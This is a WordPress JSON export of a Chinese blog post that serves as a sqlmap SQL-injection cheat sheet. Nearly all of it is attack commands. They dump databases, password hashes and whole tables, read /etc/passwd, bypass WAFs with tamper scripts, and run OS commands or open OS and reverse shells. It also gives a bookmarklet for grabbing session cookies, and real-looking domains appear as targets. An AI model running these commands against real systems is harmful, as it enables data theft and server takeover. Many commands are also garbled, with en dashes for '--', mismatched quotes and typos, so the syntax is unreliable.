{"id":1677,"date":"2024-05-08T17:35:25","date_gmt":"2024-05-08T09:35:25","guid":{"rendered":"http:\/\/oneai.eu.org\/?p=1677"},"modified":"2024-05-08T17:35:25","modified_gmt":"2024-05-08T09:35:25","slug":"sqlmap%e5%b8%b8%e7%94%a8%e6%8a%80%e5%b7%a7","status":"publish","type":"post","link":"https:\/\/oneai.eu.org\/?p=1677","title":{"rendered":"SQLmap\u5e38\u7528\u6280\u5de7"},"content":{"rendered":"<pre><code class=\"language-bash\">\u5e38\u7528\u53c2\u6570\uff1a\n\n(1)\u5224\u65ad\u5f53\u524d\u7528\u6237\u662f\u5426\u662fdba: .\/sqlmap.py -u &quot;url&quot; --is-dba -v 1\n\n(2)\u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7528\u6237\uff1a.\/sqlmap.py -u &quot;url&quot; --users -v 0\n\n(3)\u6570\u636e\u5e93\u7528\u6237\u5bc6\u7801(hash):\n\n.\/sqlmap.py -u &quot;url&quot; --passwords -v 0\n\n.\/sqlmap.py -u &quot;url&quot; --passwords -U sa -v 0\n\n(4)\u67e5\u770b\u7528\u6237\u6743\u9650\uff1a\n\n.\/sqlmap.py -u &quot;url&quot; --privileges -v 0\n\n.\/sqlmap.py -u &quot;url&quot; --privileges -U postgres -v 0\n\n(5)\u5217\u51fa\u6570\u636e\u5e93\uff1a\n\n.\/sqlmap.py -u &quot;url&quot; --dbs -v 0\n\n(6)\u5217\u51fa\u6570\u636e\u5e93\u8868\uff1a\n\n.\/sqlmap.py -u &quot;url&quot; --tables -D &quot;information_scheam&quot;\n\n(7)\u5217\u51fa\u8868\u4e2d\u7684\u5217\u540d\uff1a\n\n.\/sqlmap.py -u &quot;url&quot; --columns -T &quot;user&quot; -D &quot;mysql&quot; -v 1\n\n(8)\u5217\u51fa\u6307\u5b9a\u5217\u7684\u5185\u5bb9\uff1a\n\n.\/sqlmap.py -u &quot;url&quot; --dump -T &quot;users&quot; -D &quot;testdb&quot; -C &quot;\u6307\u5b9a\u5b57\u6bb5\u201d  \n\n\u6307\u5b9a\u8303\u56f4\uff1a\n\n.\/sqlmap.py -u &quot;url&quot; --dump -T &quot;users&quot; -D &quot;testdb&quot; --start 2 --stop 4 -v 0\n\n(9)\u5217\u51fa\u6240\u6709\u6570\u636e\u5e93\uff0c\u6240\u6709\u8868\u5185\u5bb9:\n\n.\/sqlmap.py -u &quot;url&quot; --dump-all -v 0\n\n\u53ea\u5217\u51fa\u7528\u6237\u81ea\u5df1\u65b0\u5efa\u7684\u6570\u636e\u5e93\u548c\u8868\u7684\u5185\u5bb9\uff1a\n\n.\/sqlmap.py -u &quot;url&quot; --dump-all --exclude-sysdbs -v 0\n\n(10)\u8bfb\u53d6\u6587\u4ef6\u5185\u5bb9[load_file(\u51fd\u6570)]\uff1a\n\n.\/sqlmap.py -u &quot;url&quot; --file \/etc\/password\n\n(11)\u6267\u884cSQL:\n\n.\/sqlmap.py -u &quot;url&quot; --sql-shell\n\n(12)\u6307\u5b9a\u53c2\u6570\uff1a\n\n.\/sqlmap.py -u &quot;url&quot; -p &quot;id&quot; -v 1\n\n(13)POST\u63d0\u4ea4\uff1a\n\n.\/sqlmap.py -u &quot;url&quot; --method POST --data &quot;id=1&quot;\n\n(14)COOKIE\u63d0\u4ea4\uff1a\n\n.\/sqlmap.py -u &quot;url&quot; --cookie &quot;id=1&quot; -v 1\n\n(15)refer\u6b3a\u9a97\uff1a\n\n.\/sqlmap.py -u &quot;url&quot; --refer &quot;url&quot; -v 3\n\n(16)\u4f7f\u7528\u81ea\u5b9a\u4e49user-agent\u6216\u8005user-agents.txt\uff1a\n\n.\/sqlmap.py -u &quot;url&quot; --user-agent &quot;Mozilla\/4.0(compatible;MSIE 7.0;Windows NT5.1)&quot; -v 3\n\n.\/sqlmap.py -u &quot;url&quot; -a &quot;.\/txt\/user-agents.txt&quot; -v 1\n\n(17)\u4f7f\u7528\u591a\u7ebf\u7a0b\u731c\u89e3\uff1a\n\n.\/sqlmap.py -u &quot;url&quot; --current-user --threads 3 -v 1\n\n(18)\u6307\u5b9a\u6570\u636e\u5e93\uff0c\u7ed5\u8fc7salmap\u81ea\u52a8\u68c0\u6d4b\uff1a\n\n.\/sqlmap.py -u &quot;url&quot; --dbms &quot;PostgreSQL&quot; -v 2\n\n(19)\u6307\u5b9a\u64cd\u4f5c\u7cfb\u7edf\uff1a\n\n.\/sqlmap.py -u &quot;url&quot; --os &quot;Windows&quot; -v 2\n\n(20)\u81ea\u52a8\u4e49payload:\n\n.\/sqlmap.py -u &quot;url&quot; -p &quot;id&quot; --prefix &quot; &#039; &quot; --postfix &quot;and &#039;test&#039; = &#039;test &quot;\n\n(21)union\u6ce8\u5165\u6d4b\u8bd5\uff1a\n\n.\/sqlmap.py -u &quot;url&quot; --union-test -v 1\n\n(22)\u914d\u5408order by:\n\n.\/sqlmap.py -u &quot;url&quot; --union-test --union-tech orderby -v 1\n\n(23) .\/sqlmap.py -u &quot;url&quot; --union-use --banner -v 1\n\n.\/sqlmap.py -u &quot;url&quot; --union-use --current-user -v 5\n\n.\/sqlmap.py -u &quot;url&quot; --union-use --dbs -v 1\n\n========================================================================\n\n========================================================================\n\n1. \u57fa\u7840\u7528\u6cd5\uff1a\n\n.\/sqlmap.py -u &quot;\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013dbs   \/\/ \u5217\u4e3e\u6570\u636e\u5e93\n.\/sqlmap.py -u &quot;\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013current-db   \/\/ \u5f53\u524d\u6570\u636e\u5e93\n.\/sqlmap.py -u &quot;\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013users    \/\/ \u5217\u6570\u636e\u5e93\u7528\u6237\n.\/sqlmap.py -u &quot;\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013current-user  \/\/ \u5f53\u524d\u7528\u6237\n.\/sqlmap.py -u &quot;\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013tables -D &quot;\u6570\u636e\u5e93\u201d   \/\/ \u5217\u4e3e\u6570\u636e\u5e93\u7684\u8868\u540d\n.\/sqlmap.py -u &quot;\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013columns -T &quot;\u8868\u540d\u201d -D &quot;\u6570\u636e\u5e93\u201d   \/\/ \u83b7\u53d6\u8868\u7684\u5217\u540d\n.\/sqlmap.py -u &quot;\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013dump -C &quot;\u5b57\u6bb5,\u5b57\u6bb5\u201d -T &quot;\u8868\u540d\u201d -D &quot;\u6570\u636e\u5e93\u201d   \/\/ \u83b7\u53d6\u8868\u4e2d\u7684\u6570\u636e\uff0c\u5305\u542b\u5217\n\n\u5df2\u7ecf\u5f00\u59cb\u62d6\u5e93\u4e86\uff0cSQLMAP\u662f\u975e\u5e38\u4eba\u6027\u5316\u7684\uff0c\u5b83\u4f1a\u5c06\u83b7\u53d6\u7684\u6570\u636e\u5b58\u50a8sqlmap\/output\/\u4e2d\n\n2. sqlmap post\u6ce8\u5165\n\n\u6211\u4eec\u5728\u4f7f\u7528Sqlmap\u8fdb\u884cpost\u578b\u6ce8\u5165\u65f6\uff0c\n\u7ecf\u5e38\u4f1a\u51fa\u73b0\u8bf7\u6c42\u9057\u6f0f\u5bfc\u81f4\u6ce8\u5165\u5931\u8d25\u7684\u60c5\u51b5\u3002\n\u8fd9\u91cc\u5206\u4eab\u4e00\u4e2a\u5c0f\u6280\u5de7\uff0c\u5373\u7ed3\u5408burpsuite\u6765\u4f7f\u7528sqlmap\uff0c\n\u7528\u8fd9\u79cd\u65b9\u6cd5\u8fdb\u884cpost\u6ce8\u5165\u6d4b\u8bd5\u4f1a\u66f4\u51c6\u786e\uff0c\u64cd\u4f5c\u8d77\u6765\u4e5f\u975e\u5e38\u5bb9\u6613\u3002\n1. \u6d4f\u89c8\u5668\u6253\u5f00\u76ee\u6807\u5730\u5740http:\/\/ www.2cto.com \/Login.asp\n2. \u914d\u7f6eburp\u4ee3\u7406(127.0.0.1:8080)\u4ee5\u62e6\u622a\u8bf7\u6c42\n3. \u70b9\u51fblogin\u8868\u5355\u7684submit\u6309\u94ae\n4. \u5982\u4e0b\u56fe\uff0c\u8fd9\u65f6\u5019Burp\u4f1a\u62e6\u622a\u5230\u4e86\u6211\u4eec\u7684\u767b\u5f55POST\u8bf7\u6c42\n5. \u628a\u8fd9\u4e2apost\u8bf7\u6c42\u590d\u5236\u4e3atxt, \u6211\u8fd9\u547d\u540d\u4e3asearch-test.txt \u7136\u540e\u628a\u5b83\u653e\u81f3sqlmap\u76ee\u5f55\u4e0b\n\n6. \u8fd0\u884csqlmap\u5e76\u4f7f\u7528\u5982\u4e0b\u547d\u4ee4\uff1a\n.\/sqlmap.py -r search-test.txt -p tfUPass\n\n\u8fd9\u91cc\u53c2\u6570-r \u662f\u8ba9sqlmap\u52a0\u8f7d\u6211\u4eec\u7684post\u8bf7\u6c42rsearch-test.txt\uff0c\n\u800c-p \u5927\u5bb6\u5e94\u8be5\u6bd4\u8f83\u719f\u6089\uff0c\u6307\u5b9a\u6ce8\u5165\u7528\u7684\u53c2\u6570\u3002\n\n3.sqlmap  cookies\u6ce8\u5165\n\nsqlmap.py -u &quot;http:\/\/127.0.0.1\/base.php\u201d \u2013cookies &quot;id=1\u2033  \u2013dbs \u2013level 2\n\n \u9ed8\u8ba4\u60c5\u51b5\u4e0bSQLMAP\u53ea\u652f\u6301GET\/POST\u53c2\u6570\u7684\u6ce8\u5165\u6d4b\u8bd5\uff0c\u4f46\u662f\u5f53\u4f7f\u7528\u2013level \u53c2\u6570\u4e14\u6570\u503c&gt;=2\u7684\u65f6\u5019\u4e5f\u4f1a\u68c0\u67e5cookie\u65f6\u9762\u7684\u53c2\u6570\uff0c\u5f53&gt;=3\u7684\u65f6\u5019\u5c06\u68c0\u67e5User-agent\u548cReferer\uff0c\u90a3\u4e48\u8fd9\u5c31\u5f88\u7b80\u5355\u4e86\uff0c\u6211 \u4eec\u76f4\u63a5\u5728\u539f\u6709\u7684\u57fa\u7840\u4e0a\u9762\u52a0\u4e0a \u2013level 2 \u5373\u53ef\n\n\u5229\u7528sqlmap cookies\u6ce8\u5165\u7a81\u7834\u7528\u6237\u767b\u5f55\u7ee7\u7eed\u6ce8\u5165\n\u5148\u628a\u7528\u6237\u767b\u9646\u7684cookie\u62ff\u5230\u5427\uff0c\n\u5728\u6536\u85cf\u5939\u6dfb\u52a0\u4e00\u4e2a\u94fe\u63a5cookies\u5c5e\u6027\uff1a\n\u540d\u5b57\u81ea\u5df1\u53d6\njavascript:alert(document.cookie)\uff0c\uff0c\u9700\u8981\u83b7\u53d6\u5f53\u524dcookie\u7684\u65f6\u5019\uff0c\n\u76f4\u63a5\u70b9\u4e00\u4e0b\u8fd9\u4e2a\u94fe\u63a5\uff0c\u7136\u540e\u590d\u5236\u4e00\u4e0b\u5f39\u51fa\u5bf9\u8bdd\u6846\n\u91cc\u7684cookie\u503c\u5c31\u641e\u5b9a\u4e86\n\nsqlmap.py -u http:\/\/x.x.x.x\/Down.aspx?tid=2 -p tid \u2013dbms mssql \u2013cookie=\u201dinfo=username=test\u201d\n\n-p\u662f\u6307\u6307\u5b9a\u53c2\u6570\u6ce8\u5165\n\n4. sqlmap\u9047\u5230url\u91cd\u5199\u7684\u6ce8\u5165\n\n\u54ea\u91cc\u5b58\u5728\u6ce8\u5165\u5c31\u52a0\u4e0a * \u53f7\n.\/sqlmap.py -u &quot;http:\/\/www.cunlide.com\/id1\/1*\/id2\/2&quot;\n\n5.sqlmap \u7f16\u7801\u7ed5waf\u6ce8\u5165\n\n.\/sqlmap.py -u http:\/\/127.0.0.1\/test.php?id=1 -v 3 \u2013dbms &quot;MySQL\u201d \u2013technique U -p id \u2013batch \u2013tamper &quot;space2morehash.py\u201d\n\n\u5728sqlmap \u7684 tamper\u76ee\u5f55\u4e0b\u6709\u5f88\u591aspace2morehash.py \u7f16\u7801\u811a\u672c\u81ea\u884c\u52a0\u8f7d\n\n6.\u7ed3\u5408burp\u6279\u91cf\u6ce8\u5165\u7528\u6cd5\n\n\uff081) -l \u4eceBurp\u6216WebScarab\u4ee3\u7406\u7684\u65e5\u5fd7\u4e2d\u89e3\u6790\u76ee\u6807\n\na)\u5229\u7528burp\u4ee3\u7406\uff0c\u8f6c\u5230history\u9009\u9879\u5361\uff0c\u9009\u4e2d\u6570\u636e\u5305\u53f3\u952e--&gt;save items,\u4fdd\u5b58\u6587\u6863a.txt\n\n b).\/sqlmap.py --batch -l a.txt(\u5373\u53ef\u6279\u91cf\u6ce8\u5165,--batch)\n\n\uff082\uff09-m \u6279\u91cf\u6ce8\u5165url\u8fde\u63a5\u6587\u4ef6\n\na)\u5229\u7528burp\u4ee3\u7406\uff0c\u8f6c\u5230history\u9009\u9879\u5361\uff0c\u9009\u4e2d\u6570\u636e\u5305\u53f3\u952e--&gt;copy URLs,\u4fdd\u5b58\u6587\u6863b.txt\n\nb\uff09.\/sqlmap.py --batch -m b.txt\n\n----------------------------------------------------------------------------\n\n----------------------------------------------------------------------------\n\n\u5176\u4ed6\u57fa\u7840\uff1a\nsqlmap -u &quot;http:\/\/url\/news?id=1\u201d \u2013level=3 \u2013smart \u2013dbms &quot;Mysql\u201d \u2013current-user #\u83b7\u53d6\u5f53\u524d\u7528\u6237\u540d\u79f0\nsqlmap -u &quot;http:\/\/www.xxoo.com\/news?id=1\u201d \u2013level=3 \u2013smart \u2013dbms &quot;Mysql\u201d \u2013current-db  #\u83b7\u53d6\u5f53\u524d\u6570\u636e\u5e93\u540d\u79f0\nsqlmap -u &quot;http:\/\/www.xxoo.com\/news?id=1\u201d \u2013level=3 \u2013smart \u2013dbms &quot;Mysql\u201d \u2013tables  -D &quot;db_name\u201d #\u5217\u8868\u540d\nsqlmap -u &quot;http:\/\/url\/news?id=1\u201d \u2013level=3 \u2013smart  \u2013dbms &quot;Mysql\u201d \u2013columns -T &quot;tablename\u201d users-D &quot;db_name\u201d -v 0 #\u5217\u5b57\u6bb5\nsqlmap -u &quot;http:\/\/url\/news?id=1\u201d \u2013level=3 \u2013smart \u2013dbms &quot;Mysql\u201d  \u2013dump  -C &quot;column_name\u201d  -T &quot;table_name\u201d -D &quot;db_name\u201d -v 0   #\u83b7\u53d6\u5b57\u6bb5\u5185\u5bb9\n\n******************\u4fe1\u606f\u83b7\u53d6******************\nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d \u2013users  #\u5217\u6570\u636e\u5e93\u7528\u6237  \n\nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d \u2013dbs#\u5217\u6570\u636e\u5e93 \n\nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d\u2013passwords #\u6570\u636e\u5e93\u7528\u6237\u5bc6\u7801  \n\nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d\u2013passwords-U root  -v 0 #\u5217\u51fa\u6307\u5b9a\u7528\u6237\u6570\u636e\u5e93\u5bc6\u7801 \n\n sqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d \u2013dump-all -v 0 #\u5217\u51fa\u6240\u6709\u6570\u636e\u5e93\u6240\u6709\u8868   \nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d\u2013privileges #\u67e5\u770b\u6743\u9650  \n\nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d\u2013privileges -U root #\u67e5\u770b\u6307\u5b9a\u7528\u6237\u6743\u9650  \n\nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d \u2013is-dba -v 1 #\u662f\u5426\u662f\u6570\u636e\u5e93\u7ba1\u7406\u5458 \n\n sqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d \u2013roles #\u679a\u4e3e\u6570\u636e\u5e93\u7528\u6237\u89d2\u8272  \n\nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d\u2013udf-inject #\u5bfc\u5165\u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570\uff08\u83b7\u53d6\u7cfb\u7edf\u6743\u9650\uff01\uff09  \n\nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d\u2013dump-all \u2013exclude-sysdbs -v 0 #\u5217\u51fa\u5f53\u524d\u5e93\u6240\u6709\u8868  \nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d \u2013union-check #\u662f\u5426\u652f\u6301union \u6ce8\u5165  \n\nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d\u2013union-cols #union \u67e5\u8be2\u8868\u8bb0\u5f55  \n\nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d \u2013union-test #union \u8bed\u53e5\u6d4b\u8bd5  \nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d \u2013union-use \u2013banner #\u91c7\u7528union \u6ce8\u5165 \n\n sqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d\u2013union-test \u2013union-tech orderby #union \u914d\u5408 order by  \nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d\u2013method &quot;POST\u201d \u2014 data &quot;id=1&amp;cat=2\u2033 #post\u6ce8\u5165  \n\nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d\u2013cookie &quot;COOKIE_VALUE\u201d #cookie\u6ce8\u5165  \nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d-b #\u83b7\u53d6banner\u4fe1\u606f \n\nsqlmap -u &quot;http:\/\/url\/news?id=1\u201d \u2013level=3 \u2013smart-v 1 -f #\u6307\u7eb9\u5224\u522b\u6570\u636e\u5e93\u7c7b\u578b\nsqlmap -u &quot;http:\/\/url\/news?id=1\u201d \u2013level=3 \u2013smart\u2013proxy\u201dhttp:\/\/127.0.0.1:8118\u201d #\u4ee3\u7406\u6ce8\u5165\nsqlmap -u &quot;http:\/\/url\/news?id=1\u2033\u2013string\u201dSTRING_ON_TRUE_PAGE&quot;  #\u6307\u5b9a\u5173\u952e\u8bcd\n\nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d\u2013sql-shell #\u6267\u884c\u6307\u5b9asql\u547d\u4ee4  \nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d\u2013file \/etc\/passwd  \n\nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d\u2013os-cmd=whoami #\u6267\u884c\u7cfb\u7edf\u547d\u4ee4  \n\nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d\u2013os-shell #\u7cfb\u7edf\u4ea4\u4e92shell  \n\nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d\u2013os-pwn #\u53cd\u5f39\n\nshell  sqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d\u2013reg-read #\u8bfb\u53d6win\u7cfb\u7edf\u6ce8\u518c\u8868  \n\nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d \u2013dbs-o &quot;sqlmap.log\u201d #\u4fdd\u5b58\u8fdb\u5ea6  \n\nsqlmap -u &quot; \u2013smart \u2013dbms &quot;Mysql\u201d \u2013dbs  -o &quot;sqlmap.log\u201d \u2013resume  #\u6062\u590d\u5df2\u4fdd\u5b58\u8fdb\u5ea6 \n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u5e38\u7528\u53c2\u6570\uff1a (1)\u5224\u65ad\u5f53\u524d\u7528\u6237\u662f\u5426\u662fdba: .\/sqlmap.py -u &quot;url&quot; &#8211;is-dba -v 1 (2)\u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7528\u6237\uff1a.\/sqlmap.py -u &quot;url&quot; &#8211;users -v 0 (3)\u6570\u636e\u5e93\u7528\u6237\u5bc6\u7801(hash): .\/sqlmap.py -u &quot;url&quot; &#8211;passwords -v 0 .\/sqlmap.py -u &quot;url&quot; &#8211;passwords -U sa -v 0 (4)\u67e5\u770b\u7528\u6237\u6743\u9650\uff1a .\/sqlmap.py -u &quot;url&quot; &#8211;privileges -v 0 .\/sqlmap.py -u &quot;url&quot; &#8211;privileges -U postgres -v 0 (5)\u5217\u51fa\u6570\u636e\u5e93\uff1a .\/sqlmap.py -u &quot;url&quot; &#8211;dbs -v 0 (6)\u5217\u51fa\u6570\u636e\u5e93\u8868\uff1a .\/sqlmap.py -u &quot;url&quot; &#8211;tables -D &quot;information_scheam&quot; (7)\u5217\u51fa\u8868\u4e2d\u7684\u5217\u540d\uff1a .\/sqlmap.py -u &quot;url&quot; &#8211;columns -T &quot;user&quot; -D &quot;mysql&quot; -v 1 (8)\u5217\u51fa\u6307\u5b9a\u5217\u7684\u5185\u5bb9\uff1a .\/sqlmap.py -u &quot;url&quot; &#8211;dump -T &quot;users&quot; -D &quot;testdb&quot; -C &quot;\u6307\u5b9a\u5b57\u6bb5\u201d \u6307\u5b9a\u8303\u56f4\uff1a .\/sqlmap.py -u &quot;url&quot; &#8211;dump -T &quot;users&quot; -D &quot;testdb&quot; &#8211;start 2 &#8211;stop 4 -v 0 (9)\u5217\u51fa\u6240\u6709\u6570\u636e\u5e93\uff0c\u6240\u6709\u8868\u5185\u5bb9: .\/sqlmap.py -u &quot;url&quot; &#8211;dump-all -v 0 \u53ea\u5217\u51fa\u7528\u6237\u81ea\u5df1\u65b0\u5efa\u7684\u6570\u636e\u5e93\u548c\u8868\u7684\u5185\u5bb9\uff1a .\/sqlmap.py -u &quot;url&quot; &#8211;dump-all &#8211;exclude-sysdbs -v 0 (10)\u8bfb\u53d6\u6587\u4ef6\u5185\u5bb9[load_file(\u51fd\u6570)]\uff1a .\/sqlmap.py -u &quot;url&quot; &#8211;file \/etc\/password (11)\u6267\u884cSQL: .\/sqlmap.py -u &quot;url&quot; &#8211;sql-shell (12)\u6307\u5b9a\u53c2\u6570\uff1a .\/sqlmap.py -u &quot;url&quot; -p &quot;id&quot; -v 1 (13)POST\u63d0\u4ea4\uff1a .\/sqlmap.py -u &quot;url&quot; &#8211;method POST &#8211;data &quot;id=1&quot; (14)COOKIE\u63d0\u4ea4\uff1a .\/sqlmap.py -u &quot;url&quot; &#8211;cookie &quot;id=1&quot; -v 1 (15)refer\u6b3a\u9a97\uff1a .\/sqlmap.py -u &quot;url&quot; &#8211;refer &quot;url&quot; -v 3 (16)\u4f7f\u7528\u81ea\u5b9a\u4e49user-agent\u6216\u8005user-agents.txt\uff1a .\/sqlmap.py -u &quot;url&quot; &#8211;user-agent &quot;Mozilla\/4.0(compatible;MSIE 7.0;Windows NT5.1)&quot; -v 3 .\/sqlmap.py -u &quot;url&quot; -a &quot;.\/txt\/user-agents.txt&quot; -v 1 (17)\u4f7f\u7528\u591a\u7ebf\u7a0b\u731c\u89e3\uff1a .\/sqlmap.py -u &quot;url&quot; &#8211;current-user &#8211;threads 3 -v 1 (18)\u6307\u5b9a\u6570\u636e\u5e93\uff0c\u7ed5\u8fc7salmap\u81ea\u52a8\u68c0\u6d4b\uff1a .\/sqlmap.py -u &quot;url&quot; &#8211;dbms &quot;PostgreSQL&quot; -v 2 (19)\u6307\u5b9a\u64cd\u4f5c\u7cfb\u7edf\uff1a .\/sqlmap.py -u &quot;url&quot; &#8211;os &quot;Windows&quot; -v 2 (20)\u81ea\u52a8\u4e49payload: .\/sqlmap.py -u &quot;url&quot; -p &quot;id&quot; &#8211;prefix &quot; &#039; &quot; &#8211;postfix &quot;and &#039;test&#039; = &#039;te&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_eb_attr":"","footnotes":""},"categories":[95,80],"tags":[],"class_list":["post-1677","post","type-post","status-publish","format-standard","hentry","category-95","category-80"],"_links":{"self":[{"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/posts\/1677","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1677"}],"version-history":[{"count":1,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/posts\/1677\/revisions"}],"predecessor-version":[{"id":1678,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/posts\/1677\/revisions\/1678"}],"wp:attachment":[{"href":"https:\/\/oneai.eu.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1677"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1677"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1677"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}